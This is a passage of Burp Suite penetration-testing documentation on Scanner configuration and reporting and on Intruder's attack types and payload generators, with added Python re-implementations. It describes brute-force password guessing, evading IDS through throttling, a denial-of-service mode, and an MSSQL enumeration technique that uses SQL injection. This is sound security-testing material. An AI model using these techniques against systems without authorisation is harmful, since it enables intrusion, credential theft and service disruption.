scanning, or selecting them for scanning from the site map. And it provides immediate
feedback about those areas to inform your manual testing actions.

Reviewing results
In addition to the per-request view of discovered issues shown above, Burp Scanner
maintains a central record of all the issues it has discovered, organised in a tree view of
the target application's site map. Selecting a host or folder in the tree shows a listing of
all the issues identified for that branch of the site:

Where multiple issues have been found of the same type, these are aggregated into a
single item in the top-right panel. You can expand the aggregated item to view each
individual instance of the issue. Selecting an issue in the top-right panel shows the full
detail for that issue in the bottom-right panel. This includes a customised vulnerability
advisory, and the full requests and responses that are relevant to understanding and
reproducing the issue.
The advisory includes a standard description of the issue and its remediation, and also
a description of any specific features that apply to the issue and affect its remediation.
In the example above, the cross-site scripting advisory tells us:

The request parameter in which the attack input is supplied (SearchTerm).

The syntactic context in which the input is returned in the response (within a
piece of JavaScript, in a single-quote-delimited string).

That the application escapes any single quote characters in our input, but fails to
escape the backslash, allowing us to circumvent the filter.

The exact proof-of-concept payload which Burp submitted to the application, and
the form in which this payload was returned.

That the original request used the POST method, and Burp was able to convert
this to a GET request to facilitate demonstration and exploitation of the issue.
Every issue that Burp Scanner reports is given a rating both for severity (high, medium,
low, informational) and for confidence (certain, firm, tentative). When an issue has
been identified using a less reliable technique, Burp makes you aware of this, by
dropping the confidence level.
Alongside the advisory, Burp shows the requests and responses that were used to
identify the issue, with relevant portions highlighted. You can review these to see how
Burp identified the issue, and quickly understand the nature of the vulnerability. You
can also send the request directly to other tools to manually verify the issue, or fine-tune
the proof-of-concept attack that was generated by Burp:

Within the list of scan issues, you can modify the severity and confidence levels of
individual or multiple issues (via the context menu), or delete issues altogether (via the
context menu or using the 'del' key).
Note that if you delete an issue, and Burp rediscovers the same issue (for example, if
you rescan the same request), the issue will be reported again. If instead you mark the
issue as a false positive, then this will not happen. Therefore, deletion of issues is best
used for cleaning up the Results tree to remove hosts or paths you are not interested
in. For unwanted issues within the functionality you are still working on, you should use
the false positive flag.

Scan optimisation
Burp Scanner gives you detailed information in real time about all of the actions it is
performing. In the scan queue, you can monitor the progress of each individual base
request that is being scanned. The table shows you the number of "insertion points"
where Burp is placing payloads, and the number of attack requests that have been
generated. (The latter is not a linear function of the former - observed application
behaviour feeds back into subsequent attack requests, just as it would for a human
tester.)
This information lets you quickly see whether any of your scans are progressing too
slowly, and understand the reasons why. Given this information, you can then take
action to optimise your scans. Within the scan queue, there is a context menu which
lets you cancel or re-prioritise individual items. Within the Options tab, you can also
optimise the scanner configuration based on what you have learnt about the
application, using the options described below.

Attack insertion points


A key factor in the speed and effectiveness of scans is the selection of attack insertion
points. Burp gives you fine-grained control over the locations within the base request
where attack payloads will be placed, using the following configuration options:

The checkboxes let you define which locations within HTTP requests will have attacks
placed into them:

The values of URL, body and cookie parameters.

Parameter name - if selected, Burp adds an additional parameter to the request
and places attacks into the name of this parameter, often detecting unusual bugs that
are missed if only parameter values are tested.

HTTP headers - if selected, Burp places attacks into the User-Agent and Referer
headers, often detecting issues like SQL injection or persistent XSS within logging
functionality.

AMF string parameters - For requests in Action Message Format, Burp places
attacks into any string-based data types within the message.

REST-style URL parameters - if selected, Burp places attacks into each directory
or file name within the path portion of the URL.
You can also set a limit on the number of insertion points that Burp will attack within
each base request. Occasionally, HTML forms may contain an excessive number of fields
(hundreds, or more). If Burp performed a full vulnerability scan of every field, the scan
would take an excessive amount of time to complete. Setting a limit on insertion points
prevents your scans from becoming stalled if they encounter forms with huge numbers
of parameters. When this limit is applied, the item's entry in the scan queue will
indicate the number of insertion points that were skipped, enabling you to manually
review the base request and decide if it is worth performing a full vulnerability scan of
all its possible entry points.
You can tell Burp to use "intelligent attack selection". This option causes Burp to
perform or omit each type of server-side check based on the base value of each attack
insertion point. For example, if a parameter's value contains characters that don't
normally appear in filenames, Burp will skip file path traversal checks for this
parameter. Using this option can considerably speed up your scans, with minimal risk of
missing actual vulnerabilities that exist.
The insertion point configuration lets you specify request parameters for which Burp
should skip server-side injection checks. These checks are relatively time-consuming,
because Burp sends multiple requests probing for various blind vulnerabilities on the
server. If you believe that certain parameters appearing within requests are not
vulnerable (for example, built-in parameters used only by the platform or web server),
you can tell Burp not to test these. (Note that client-side checks like cross-site scripting
are always performed because testing each request parameter imposes minimal
overhead on the duration of the scan if the parameter is non-vulnerable.)

You can identify REST parameters by their position (slash-delimited) within the URL
path, as well as by their value. To do this, select "REST parameter" from the parameter
drop-down, "name" from the item drop-down, and specify the index number (1-based)
of the position within the URL path which you wish to exclude from testing.

You can also configure any parameters for which Burp should not perform any checks
whatsoever.
It is possible to specify fully customisable attack insertion points for active scanning, so
you can specify arbitrary locations within a base request where attack strings should be
placed. To use this function, send the relevant base request to Intruder, use the payload
positions UI to define the start/end of each insertion point in the usual way, and select
the Intruder menu option "actively scan defined insertion points".

Active scanning engine

These options let you fine-tune Burp's scan engine, depending on the performance
impact on the application, and on your own processing power and bandwidth. If you
find that your scans are running slowly, but the application is performing well and your
own CPU utilisation is low, you can increase the number of scan threads to make your
scans proceed faster. If you find that connection errors are occurring, that the
application is slowing down, or that your own computer is locking up, you should reduce
the thread count, and maybe increase the number of retries on network failure and the
pause between retries. If the functionality of the application is such that actions
performed on one base request interfere with the responses returned from other
requests, you should consider reducing the thread count to 1, to ensure that only a
single base request is scanned at a time.
If you wish to avoid overloading the application, or to remain stealthy from a network
perspective, you can use the throttle settings to add fixed or random intervals between
requests.
You can configure whether the scanner should follow redirections where this is
necessary to identify certain vulnerabilities (for example echoed input or a database
error message which is only displayed when a redirect is followed).
Because some applications issue redirects to third-party URLs which include parameter
values that you have submitted, Burp protects you against inadvertently attacking
third-party applications, by not following just any redirection which is received. If the
request being scanned is within the defined target scope (i.e. you are using target
scope to control what gets scanned), then Burp will only follow redirects that are within
that scope. If the request being scanned is not in scope (i.e. you have manually
initiated a scan of an out-of-scope request), Burp will only follow redirects which (a) are
to the same host/port as the request being scanned; and (b) are not explicitly covered
by a scope exclusion rule (e.g. "logout.aspx").
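The redirect-following rule just described, written out in Python as an added example (it is not Burp's own code); it assumes the target scope is available as a callable and that exclusion rules are regular expressions matched against the redirect target URL.

```python
# Added example, not Burp's own code: the rule for following redirects while
# scanning. Assumptions: in_scope(url) is the target-scope test (include rules
# minus exclusions) and exclusion rules are regex strings.
import re
from urllib.parse import urljoin, urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def host_port(url):
    """(host, effective port) for a URL, filling in the scheme's default port."""
    parts = urlsplit(url)
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(parts.scheme)
    return ((parts.hostname or "").lower(), port)


def should_follow_redirect(scanned_url, location, in_scope, exclusions):
    """True if a redirect to `location` (absolute or relative), received while
    scanning `scanned_url`, may be followed without hitting a third party."""
    target = urljoin(scanned_url, location)
    if in_scope(scanned_url):
        # Scanning inside the defined target scope: never leave it.
        return in_scope(target)
    # Manually scanned out-of-scope request: stay on the same host and port,
    # and still honour explicit exclusion rules such as a logout page.
    if host_port(target) != host_port(scanned_url):
        return False
    return not any(re.search(rule, target) for rule in exclusions)


# Constructed scope for the example: everything on shop.example except logout.
EXCLUSIONS = [r"logout\.aspx"]


def in_shop_scope(url):
    return (urlsplit(url).hostname == "shop.example"
            and not any(re.search(rule, url) for rule in EXCLUSIONS))
```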

Active scanning areas

These options let you define which checks are performed during active scanning. Each
check that is performed increases the number of requests made, and the overall time of
each scan. You can turn individual checks on or off, based on your knowledge of an
application's technologies, or on how rigorous you require your scans to be. For
example, if you know that an application does not use any LDAP, you can turn off LDAP
injection tests. Or you can configure Burp to do a quick once-over of an application,
checking only for XSS and SQL injection in URL and body parameters, before returning
later to carry out more comprehensive testing of every vulnerability type in every
insertion point.

Passive scanning areas

Passive scans do not send any requests of their own, and each passive check imposes a
negligible processing load on your computer. Nevertheless, you can disable individual
areas of checks if you are simply not interested in them and don't want them appearing
within scan results.

Reporting
When you have finished testing, you can export a report of all or selected issues in
HTML format. To do this, select the desired issues from the aggregated results display
(you can multi-select individual hosts, folders, issues, etc.) and select "report issues"
from the context menu. The reporting wizard lets you choose various options for your
report, including:

The reporting format (screen- or printer-friendly).

The level of issue description and remediation to include.

Whether to show request and response details in full, or as extracts, or not at all.

The categories of discovered issues to include or exclude.

Whether to organise issues by type, severity or URL.

Report title, heading levels, etc.


The report for the cross-site scripting vulnerability shown previously, with all detail
turned on, and showing extracts of application responses in printer-friendly format,
looks like this:

You can also report issues in XML format, to enable easy integration with other tools.
The XML has a flat structure, and contains a list of issues, with meta-information about
issue type, URL, etc., reported within each issue element. The (internal) DTD looks like
this:
<!DOCTYPE issues [
<!ELEMENT issues (issue*)>
<!ATTLIST issues burpVersion CDATA "">
<!ATTLIST issues exportTime CDATA "">
<!ELEMENT issue (serialNumber, type, name, host, path, location, severity,
confidence, issueBackground?, remediationBackground?, issueDetail?,
remediationDetail?, requestresponse*)>
<!ELEMENT serialNumber (#PCDATA)>
<!ELEMENT type (#PCDATA)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT host (#PCDATA)>
<!ELEMENT path (#PCDATA)>
<!ELEMENT location (#PCDATA)>
<!ELEMENT severity (#PCDATA)>
<!ELEMENT confidence (#PCDATA)>
<!ELEMENT issueBackground (#PCDATA)>
<!ELEMENT remediationBackground (#PCDATA)>
<!ELEMENT issueDetail (#PCDATA)>
<!ELEMENT remediationDetail (#PCDATA)>
<!ELEMENT requestresponse (request?, response?)>
<!ELEMENT request (#PCDATA)>
<!ELEMENT response (#PCDATA)>
]>
The serialNumber element contains a long integer that is unique to that individual issue.
If you export issues several times from the same instance of Burp, you can use the
serial number to identify incrementally new issues.
The type element contains an integer which uniquely identifies the type of finding (SQL
injection, XSS, etc.). This value is stable across different instances and builds of Burp.
The name element contains the corresponding descriptive name for the issue type.
The path element contains the URL for the issue (excluding query string).
The location element includes both the URL and a description of the entry point for the
attack, where relevant (a specific URL parameter, request header, etc.).
The other elements, some of which are optional and can be selected by the user within
the reporting wizard, are hopefully self-explanatory.
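As an added example (it is not Burp's code and not part of the original text), the following Python reads exports that follow the DTD shown above, uses serialNumber to pick out the issues that are new since an earlier export from the same session, and aggregates instances by issue type as the results panel does. The two exports and their type numbers are constructed for the example.

```python
# Added example, not Burp's own code: works with Scanner XML exports shaped
# like the DTD above. The exports below are constructed by hand and their
# <type> numbers are placeholders, not Burp's real issue-type identifiers.
import xml.etree.ElementTree as ET

SEVERITY_RANK = {"High": 3, "Medium": 2, "Low": 1, "Informational": 0}
CONFIDENCE_RANK = {"Certain": 2, "Firm": 1, "Tentative": 0}

# Constructed sample: first export from one Burp session.
EXPORT_RUN1 = """<?xml version="1.0"?>
<issues burpVersion="x.y" exportTime="2012-01-01 10:00:00">
  <issue>
    <serialNumber>1001</serialNumber>
    <type>100</type>
    <name>Cross-site scripting (reflected)</name>
    <host>http://shop.example</host>
    <path>/search.aspx</path>
    <location>/search.aspx [SearchTerm parameter]</location>
    <severity>High</severity>
    <confidence>Certain</confidence>
    <requestresponse>
      <request>POST /search.aspx HTTP/1.1</request>
      <response>HTTP/1.1 200 OK</response>
    </requestresponse>
  </issue>
  <issue>
    <serialNumber>1002</serialNumber>
    <type>200</type>
    <name>Cookie without HttpOnly flag set</name>
    <host>http://shop.example</host>
    <path>/login.aspx</path>
    <location>/login.aspx</location>
    <severity>Low</severity>
    <confidence>Firm</confidence>
  </issue>
</issues>
"""

# Constructed sample: a later export from the same session, after a rescan
# found one more instance of the same XSS issue type.
EXPORT_RUN2 = EXPORT_RUN1.replace("</issues>", """  <issue>
    <serialNumber>1003</serialNumber>
    <type>100</type>
    <name>Cross-site scripting (reflected)</name>
    <host>http://shop.example</host>
    <path>/help.aspx</path>
    <location>/help.aspx [topic parameter]</location>
    <severity>High</severity>
    <confidence>Tentative</confidence>
  </issue>
</issues>""")


def parse_issues(xml_text):
    """One dict per <issue>, keyed by DTD element name; serialNumber and type
    as ints, each <requestresponse> as a (request, response) tuple."""
    root = ET.fromstring(xml_text)
    if root.tag != "issues":
        raise ValueError("root element is not <issues>")
    issues = []
    for node in root.findall("issue"):
        issue = {"requestresponse": []}
        for child in node:
            if child.tag == "requestresponse":
                issue["requestresponse"].append(
                    (child.findtext("request"), child.findtext("response")))
            else:
                issue[child.tag] = (child.text or "").strip()
        # Both are mandatory in the DTD; a KeyError here means a malformed export.
        issue["serialNumber"] = int(issue["serialNumber"])
        issue["type"] = int(issue["type"])
        issues.append(issue)
    return issues


def new_issues(previous_xml, current_xml):
    """Issues in current_xml whose serialNumber was absent from previous_xml.
    Only meaningful for exports from the same Burp instance, as the text notes."""
    seen = {i["serialNumber"] for i in parse_issues(previous_xml)}
    return [i for i in parse_issues(current_xml) if i["serialNumber"] not in seen]


def aggregate_by_type(issues):
    """Group instances by the stable <type> id, as the results panel does."""
    groups = {}
    for i in issues:
        g = groups.setdefault(i["type"], {"name": i["name"], "count": 0, "locations": []})
        g["count"] += 1
        g["locations"].append(i["location"])
    return groups


def triage(issues, min_severity="Medium", min_confidence="Firm"):
    """Issues to verify manually first: at or above both thresholds. Burp drops
    confidence for less reliable checks, so tentative findings wait for a second pass."""
    return [i for i in issues
            if SEVERITY_RANK[i["severity"]] >= SEVERITY_RANK[min_severity]
            and CONFIDENCE_RANK[i["confidence"]] >= CONFIDENCE_RANK[min_confidence]]
```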

What is Burp Intruder?


Burp Intruder is a tool for automating customised attacks against web applications.
Burp Intruder is not a point-and-click tool. To use it effectively you need to understand
how the target application functions, and have some knowledge of the HTTP protocol.
Before launching any attacks using Burp Intruder, you need to investigate the
functionality and structure of the target application, and in particular the various HTTP
messages that pass between the browser and server. You can perform this investigation
using a standard browser and Burp Proxy to intercept and view all of the requests and
responses generated by the application. When you have identified some interesting
HTTP requests that bear closer examination, you are ready to use Burp Intruder.
Burp Intruder is highly configurable and can be used to automate a wide range of
attacks. You can use Burp Intruder to facilitate very many kinds of tasks, including
enumerating identifiers, harvesting useful data, and fuzzing for vulnerabilities. The
types of attacks that are appropriate will depend on the application in question, and
may include: testing for flaws such as SQL injection, cross-site scripting, buffer
overflows and path traversal; brute force attacks against authentication schemes;
enumeration; parameter manipulation; trawling for hidden content and functionality;
session token sequencing and session hijacking; data mining; concurrency attacks; and
application-layer denial-of-service attacks. For a detailed discussion of the kinds of
attack that can be performed using Burp Intruder, see Chapter 13 of The Web
Application Hacker's Handbook.

Burp Intruder includes many preset lists of attack "payloads" (strings that are useful in
detecting and exploiting common vulnerabilities). It also contains a large number of
tools for dynamically generating attack vectors that are appropriate to specific
mechanisms often found within web applications. External files can also be loaded and
incorporated into Burp Intruder (e.g. lists of enumerated usernames, or fuzz strings for
newly-identified vulnerabilities).
The core activity of each attack is to iterate through a number of HTTP requests. These
are derived from the basic request identified at the investigation stage. Burp Intruder
manipulates this basic request in particular ways designed to identify or exploit
application vulnerabilities. It does this by replacing portions of the basic request with
one or more payloads. The timing and execution of each attack can also be configured.
Multiple threads can be used to generate requests concurrently. Requests can be
throttled to prevent IDS detection. A denial-of-service mode can be used to bombard
the server with requests while ignoring any responses received.
When an attack executes, a detailed table of results is produced, showing the response
received from the server to each request. The results contain all relevant information
that can be used to pinpoint responses that are interesting or successful. In addition to
the standard results common to every attack, many customisable tests can be
performed on the results at runtime, and the results of these are also recorded. For
example, Burp Intruder can be configured to extract specific information from HTML
pages (e.g. the personal details fields on a user information page), and record this
information with each result. All results output can be exported for further
manipulation, or to use as an input file for further attacks or other tools.
Burp Intruder is a Java application, and runs on any platform for which a Java Runtime
Environment is available. It requires version 1.5 or later. The JRE can be obtained for
free from java.sun.com.

Configuring Burp Intruder


The Burp Intruder control panel lets you configure one or more attacks simultaneously,
in their own numbered tabs. You can create a new tab, or rename existing tabs using
the Intruder menu.
The configuration of each individual attack is carried out in a number of sub-tabs
(target, positions, payloads, options). The easiest way to create a new attack is to
locate the relevant base request within another Burp tool (such as the proxy history or
site map), and choose "send to intruder" from the context menu. This will populate the
target and positions tabs with the relevant details. You can use the Intruder menu to
control how the payloads and options tabs are set up when you create a new attack
tab. You can choose to use the default attack configuration, copy the configuration from
the first attack tab, or copy from the last attack tab. In this way, you can set up a
standard attack configuration in your first attack tab (e.g. for fuzzing all parameters
and grepping for error messages) and have this configuration copied into each new
attack which you send to intruder. You can also copy attack configurations between
arbitrary tabs, or save and load attack configurations, using the Intruder menu.
To start an attack, set up the required configuration and then select "start attack" from
the Intruder menu. The configuration options are described in detail in the sections
below.
To load a saved attack, select "open saved attack" from the Intruder menu, and choose
the required file [Pro version].

Target tab
This tab is used to configure the details of the target server:

The "host" field is used to specify the IP address or hostname of the target server. The
"port" field is used to specify the port number of the HTTP/S service. The "use SSL" box
is used to specify whether Secure Sockets Layer connections should be used.

Positions tab
This tab is used to configure the template for all the HTTP requests generated in the
attack:

The main text editor is used to set the contents of the base request, and also to mark
the locations where payloads will be inserted into individual HTTP requests during the
attack. There is a context menu providing access to various functions.

The easiest way to set up the attack template is to locate the relevant request within
one of the other Burp tools, and select the "send to intruder" option. You can send
requests from any place within Burp Suite where an HTTP request or response is
displayed, and also from the Burp Proxy history, site map tree or table, and from within
an already executing Burp Intruder attack:

The positions of payloads are marked using pairs of characters, which may enclose
portions of the template text between them. When a payload is placed into a particular
position for a given request, the characters for that position, and any text which
appears between them, are replaced with the payload. When a particular position is not
assigned a payload for a given request (this applies only to the "sniper" attack type -
see below), the characters for that position are simply removed, and any text which
appears between them remains unchanged.
When you send a request from elsewhere within Burp Suite, Burp Intruder makes a
best guess at where you are likely to want to place payloads, and it positions these at
the value of each URL and body parameter, and each cookie. The markers and enclosed
text for each position are automatically highlighted for clarity. You can use the option on
the Intruder menu to control whether payload markers are positioned so as to replace
or append the existing parameter values. Above the request editor, the number of
defined positions and the size of the template text are indicated.
You can also use the buttons on this tab to control the positioning of payload markers:

add - This inserts a single position marker at the cursor position.

clear - This removes all position markers, either from the entire template or
from a selected portion of the template.

auto - This makes a guess as to where it might be useful to position payloads
and inserts position markers accordingly, either for the entire template or for a selected
portion of the template. Any existing markers are removed. This is a useful function to
quickly mark positions suitable for attacking certain common vulnerabilities (such as
SQL injection), but manual positioning is required for more customised attacks.

refresh - This refreshes the colour-coding of the editor, if necessary.

clear - This deletes the entire contents of the editor.


Note that automatic placement of payload positions recognises XML-formatted data
within the currently-selected range of the request template. Some applications send
XML-encapsulated data within a multipart request body, for example:
POST /function HTTP/1.0
Content-Type: multipart/form-data; boundary=weidhwiderfhwiuehwiuehfwerrf
Content-Length: 202

--weidhwiderfhwiuehwiuehfwerrf
Content-Disposition: form-data; name="data"

<data>
<param1>foo</param1>
<param2>bar</param2>
<param3>123</param3>
</data>

--weidhwiderfhwiuehwiuehfwerrf--

If you perform auto-placement of payload positions on the entire message, then
Intruder will mark the whole of the XML block as a single insertion point, which is
probably not what you want. Instead, if you manually select the exact XML block, then
the auto-placement function will recognise that the selection contains XML, and will
mark the individual XML parameter values as insertion points.
The "attack type" drop-down menu is used to define a key aspect of the behaviour of
Burp Intruder - the way in which payloads are placed into the specified positions to
form individual requests. The four possible attack types are described below:

sniper - This uses a single set of payloads. It targets each position in turn, and
inserts each payload into that position in turn. Positions which are not targeted during a
given request are not affected - the position markers are removed and any text which
appears between them in the template remains unchanged. This attack type is useful
for testing a number of data fields individually for a common vulnerability (e.g. cross-site
scripting). The total number of requests generated in the attack is the product of
the number of positions and the number of payloads in the payload set.

battering ram - This uses a single set of payloads. It iterates through the
payloads, and inserts the same payload into all of the defined positions at once. This
attack type is useful where an attack requires the same input to be inserted in multiple
places within the HTTP request (e.g. a username within the Cookie header and within
the message body). The total number of requests generated in the attack is the number
of payloads in the payload set.

pitchfork - This uses multiple payload sets. There is a different payload set for
each defined position (up to a maximum of 8). The attack iterates through all payload
sets simultaneously, and inserts one payload into each defined position. I.e., the first
request will insert the first payload from payload set 1 into position 1 and the first
payload from payload set 2 into position 2; the second request will insert the second
payload from payload set 1 into position 1 and the second payload from payload set 2
into position 2, etc. This attack type is useful where an attack requires different but
related input to be inserted in multiple places within the HTTP request (e.g. a username
in one data field, and a known ID number corresponding to that username in another
data field). The total number of requests generated by the attack is the number of
payloads in the smallest payload set.

cluster bomb - This uses multiple payload sets. There is a different payload set
for each defined position (up to a maximum of 8). The attack iterates through each
payload set in turn, so that all permutations of payload combinations are tested. I.e., if
there are two payload positions, the attack will place the first payload from payload set
1 into position 1, and iterate through all the payloads in payload set 2 in position 2; it
will then place the second payload from payload set 1 into position 1, and iterate
through all the payloads in payload set 2 in position 2. This attack type is useful where
an attack requires different and unrelated input to be inserted in multiple places within
the HTTP request (e.g. a username in one parameter, and an unknown password in
another parameter). The total number of requests generated by the attack is the
product of the number of payloads in all defined payload sets - this may be extremely
large.
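The four attack types, re-implemented in Python as an added example (not Burp's own code) so that the request totals quoted above can be checked against the generated requests; it assumes Burp's convention of marking each position with a pair of section-sign (§) characters, and the base request with two positions is constructed for the example.

```python
# Added example, not Burp's own code: how each Intruder attack type places
# payloads into the positions of a template. Assumes Burp's § markers, which
# may enclose the base value that the payload replaces.
import itertools
import re

MARKER = "\u00a7"  # the section sign
POSITION_RE = re.compile(MARKER + "(.*?)" + MARKER, re.S)
MAX_PAYLOAD_SETS = 8  # limit stated for pitchfork and cluster bomb

# Constructed base request with two positions: the user and id parameters.
TEMPLATE = ("GET /profile.aspx?user=\u00a7alice\u00a7&id=\u00a71\u00a7 HTTP/1.1\r\n"
            "Host: shop.example\r\n\r\n")


def count_positions(template):
    return len(POSITION_RE.findall(template))


def render(template, payloads):
    """Build one request. payloads has one entry per position; None means the
    position is not targeted in this request, so its markers are dropped and
    the enclosed base text is kept (the sniper rule)."""
    if len(payloads) != count_positions(template):
        raise ValueError("one payload per position required")
    it = iter(payloads)

    def fill(match):
        payload = next(it)
        return match.group(1) if payload is None else payload

    return POSITION_RE.sub(fill, template)


def sniper(template, payload_set):
    """One payload set; targets each position in turn, each payload in turn."""
    n = count_positions(template)
    for pos in range(n):
        for payload in payload_set:
            yield render(template, [payload if i == pos else None for i in range(n)])


def battering_ram(template, payload_set):
    """One payload set; the same payload in every position at once."""
    n = count_positions(template)
    for payload in payload_set:
        yield render(template, [payload] * n)


def _check_sets(template, payload_sets):
    if len(payload_sets) > MAX_PAYLOAD_SETS:
        raise ValueError("at most %d payload sets" % MAX_PAYLOAD_SETS)
    if len(payload_sets) != count_positions(template):
        raise ValueError("one payload set per position required")


def pitchfork(template, payload_sets):
    """Parallel sets: request k takes the k-th payload of every set, so the
    attack stops at the end of the smallest set."""
    _check_sets(template, payload_sets)
    for combo in zip(*payload_sets):
        yield render(template, list(combo))


def cluster_bomb(template, payload_sets):
    """All combinations; the last position's set varies fastest, as described."""
    _check_sets(template, payload_sets)
    for combo in itertools.product(*payload_sets):
        yield render(template, list(combo))


def request_count(attack, template, payload_sets):
    """The request totals the text gives for each attack type, computed from the
    set sizes alone (worth checking before launching a cluster bomb)."""
    n = count_positions(template)
    sizes = [len(s) for s in payload_sets]
    if attack == "sniper":
        return n * sizes[0]
    if attack == "battering ram":
        return sizes[0]
    if attack == "pitchfork":
        return min(sizes)
    if attack == "cluster bomb":
        total = 1
        for size in sizes:
            total *= size
        return total
    raise ValueError("unknown attack type: " + attack)
```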

Payloads tab
This tab is used to configure one or more sets of payloads. If the "pitchfork" or "cluster
bomb" attack types are defined (see Positions tab) then a separate payload set must be
configured for each defined payload position (up to a maximum of 8). Use the "payload
set" drop-down menu to select which payload set to configure.
For each payload set, it is possible to define the "source" of payloads to use (e.g. preset
list, character blocks, brute forcer, etc.), and also various additional processing to be
performed on each payload. A large number of payload sources are available within
Burp Intruder. Some of these are highly configurable and provide for a huge variety of
customised attacks. The source for the current payload set is selected using the drop-down
menu. Each payload source is explained separately below.

Payload Sources
Preset list
This is the simplest payload source, and configures a preset list of payload items:

The main controls for configuring the list are at the bottom right of the panel. Items can
be added manually using the text box and the "add" button. The "add from list" pull-down
menu can be used to add predefined lists of useful payloads, including common
usernames and passwords, strings designed to detect common vulnerabilities such as
SQL injection, etc. The "load ..." button is used to import items from a text file. The
"paste" button adds a list of items from the clipboard. The "delete" button removes the
selected item, and the "clear" button removes all items from the list.
You can customise the predefined lists of payloads that are accessible on the "add from
list" menu. To do this, select "configure preset payload lists" from the Intruder menu,
and choose your own directory containing payload files. You can use the "copy" button
to copy all of Burp's built-in payload lists into your custom directory, to use alongside
your own payloads lists:

Runtime file
This payload source configures an external text file from which payloads will be read at
runtime. This is useful when a very large list of predefined payloads is needed, to avoid
holding the entire list in memory. One payload is read from each line of the file, hence
payloads may not contain newline characters.

Custom iterator
This payload source provides a powerful way to generate custom permutations of
characters or other items according to a given template. For example, a payroll
application may identify individuals using a personnel number of the form AB/12; you
may need to iterate through all possible personnel numbers to obtain the details of all
individuals.

The custom iterator defines up to 8 different "positions" which are used to generate
permutations. Each position is configured with a list of items, and an optional
"separator" string, which is inserted between that position and the next. In the example
described above, positions 1 and 2 would be configured with the items A - Z, positions
3 and 4 with the items 0 - 9, and position 2 would be set with the separator character /.
When the attack is executed, the custom iterator iterates through each item in each
position, to cover all possible permutations. Hence, in this example, the total number of
payloads is equal to 26 * 26 * 10 * 10.
The "scheme" drop-down menu can be used to select a preconfigured setup for the
custom iterator. These can be used for various standard attacks or modified for
customised attacks. Available schemes include "directory / file . extension", which can
be used to enumerate web content, and "password + digit" which can be used to
generate an extended wordlist for password guessing attacks.
The controls at the bottom right are used to configure the items at each position. They
function in the same way as the controls in the preset list source. The "clear all" button
removes all configuration from all positions of the custom iterator.

Character substitution
This payload source takes a preset list of payload items, and produces several payloads
from each item by replacing individual characters in the item with different characters,
according to customisable rules. This payload source is useful in password guessing
attacks, e.g. for producing common variations on dictionary words:

The controls at the bottom right are used to configure the list of preset items. They
function in the same way as the controls in the preset list source.
The list of checkboxes on the right is used to configure the substitution rules. When the
attack is executed, the character substitution source works through each of the preset
items in turn. For each item, it generates a number of payloads, to include all
permutations of substituted characters according to the defined rules. For example, for
the first item in the above screenshot, the following payloads will be generated:
aahed
4ahed
a4hed
44hed
aah3d
4ah3d
a4h3d
44h3d

Case substitution
This payload source takes a preset list of payload items, and produces one or more
payloads from each item by adjusting the case of characters within each item. This
payload source may be useful in password guessing attacks, e.g. for producing case
variations on dictionary words.

The controls at the bottom right are used to configure the list of preset items. They
function in the same way as the controls in the preset list source.
The checkboxes on the right are used to configure the case substitution rules. The
available rules perform the following functions:

no change - the item is added to the payload set without being modified

to lower case - all letters in the item are converted to lower case, and the
result is added to the payload set

to upper case - all letters in the item are converted to upper case, and the
result is added to the payload set

to Propername - the first letter in the item is converted to upper case, the
subsequent letters are converted to lower case, and the result is added to the payload
set

to ProperName - the first letter in the item is converted to upper case, the
subsequent letters are not changed, and the result is added to the payload set
When the attack is executed, the case substitution source works through each of the preset items in turn. For each item, it generates a payload for each of the selected case substitution rules. If the rule results in a new unique payload, it is added to the payload set (i.e. duplicate payloads are discarded). For example, for the preset item aahed with all five rules selected, only three distinct payloads result, because "no change" and "to lower case" coincide for an all-lower-case item, as do the two proper-name rules:
aahed
AAHED
Aahed
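Both sources are simple enough to re-create outside Burp, for instance to pre-generate a wordlist for another tool. The following Python is an added example written for this page, not Burp's own code; the item "aahed" and the rules a → 4, e → 3 are the ones used in the text, and expand_wordlist, which chains the two sources, is this example's own helper (Intruder applies a single payload source per payload set).

```python
import itertools

# Added example (not Burp's code): re-implementation of Intruder's
# "character substitution" and "case substitution" payload sources.


def char_substitutions(item, rules):
    """All payloads obtained by optionally replacing each character of `item`
    that appears in `rules` (dict original -> replacement). k matching
    positions give 2**k payloads; the unmodified item comes first and the
    leftmost matching position varies fastest, as in the text's example."""
    positions = [i for i, ch in enumerate(item) if ch in rules]
    payloads = []
    for combo in itertools.product((False, True), repeat=len(positions)):
        flags = combo[::-1]  # itertools.product varies the last element fastest
        chars = list(item)
        for pos, substitute in zip(positions, flags):
            if substitute:
                chars[pos] = rules[item[pos]]
        payloads.append("".join(chars))
    return payloads


# The five case rules, in the order Intruder lists them.
CASE_RULES = {
    "no change": lambda s: s,
    "to lower case": str.lower,
    "to upper case": str.upper,
    "to Propername": lambda s: s[:1].upper() + s[1:].lower(),
    "to ProperName": lambda s: s[:1].upper() + s[1:],
}


def case_variants(item, selected=tuple(CASE_RULES)):
    """One payload per selected rule, discarding duplicates (so "no change"
    and "to lower case" collapse for an all-lower-case item)."""
    payloads = []
    for name in selected:
        candidate = CASE_RULES[name](item)
        if candidate not in payloads:
            payloads.append(candidate)
    return payloads


def expand_wordlist(items, rules, selected=tuple(CASE_RULES)):
    """This example's own helper: chain both sources to build a wordlist for
    another tool. Intruder itself applies one payload source per payload set."""
    out = []
    for item in items:
        for substituted in char_substitutions(item, rules):
            for variant in case_variants(substituted, selected):
                if variant not in out:
                    out.append(variant)
    return out


if __name__ == "__main__":
    rules = {"a": "4", "e": "3"}
    print(char_substitutions("aahed", rules))
    print(case_variants("aahed"))
    print(len(expand_wordlist(["aahed"], rules)))
```

Running the module prints the eight substitution payloads and the three case variants listed above; chaining the two for "aahed" yields 20 distinct words, which is a useful reminder that substitution and case rules multiply rather than add.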

Recursive grep
This payload set works together with the "extract grep" function (which is explained
below). It allows payloads to be generated recursively on the basis of responses to
earlier requests. The "extract grep" function captures a portion of a server response
following a matched regular expression. With "recursive grep" payloads, the captured
text from the previous server response is used as the payload for the subsequent
request.

This can be used for various enumeration tasks. For example, it may be possible to enumerate the contents of a Microsoft SQL Server database via SQL injection by recursively submitting queries of the form:
union select name from sysobjects where name>'a'
Because name is a character column and the original query expects an integer in that position, the server's type-conversion error message discloses the name of the first database object that sorts after the supplied value:
Syntax error converting the varchar value 'accounts' to a column of data type int.
The query is then repeated using 'accounts' to identify the next object. This task can be easily automated using recursive grep payloads to quickly enumerate all of the objects within the database.
